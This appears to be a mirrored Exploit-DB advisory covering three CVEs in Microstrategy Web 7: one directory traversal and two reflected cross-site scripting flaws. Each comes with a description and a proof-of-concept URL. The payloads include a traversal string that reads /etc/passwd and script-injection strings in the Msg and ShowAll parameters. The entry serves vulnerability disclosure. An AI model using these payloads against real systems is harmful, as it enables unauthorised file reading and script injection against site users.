Microstrategy Web 7 – Cross-Site Scripting / Directory Traversal

• Exploit Database
• 123 阅读

• 作者： Rafael Pedrero
  日期： 2018-10-30
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/45755/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94

  <!-- # Exploit Title: Path traversal vulnerability in Microstrategy Web version 7 # Date: 29-10-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.microstrategy.com # Software Link: https://www.microstrategy.com # Version: Microstrategy Web version 7 # Tested on: all # CVE : CVE-2018-18777 # Category: webapps   1. Description   Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application.     2. Proof of Concept   http://X.X.X.X/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=../../../../../../../../etc/passwd   3. Solution:   The product is discontinued. Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules   -->   <!-- # Exploit Title: Cross Site Scripting in Microstrategy Web version 7 # Date: 29-10-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.microstrategy.com # Software Link: https://www.microstrategy.com # Version: Microstrategy Web version 7 # Tested on: Unix # CVE : CVE-2018-18775 # Category: webapps   1. Description   Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter.     2. Proof of Concept   http://X.X.X.X/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg= "><script>alert("XSS");</script><"   3. Solution:   The product is discontinued. Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules   -->   <!-- # Exploit Title: Cross Site Scripting in Microstrategy Web version 7 # Date: 29-10-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.microstrategy.com # Software Link: https://www.microstrategy.com # Version: Microstrategy Web version 7 # Tested on: all # CVE : CVE-2018-18776 # Category: webapps   1. Description   Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the admin.asp ShowAll parameter.     2. Proof of Concept   http://X.X.X.X/microstrategy7/admin/admin.asp?ShowAll= "><script>alert("XSS")</script><"&ShowAllServers=show   3. Solution:   The product is discontinued. Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules   -->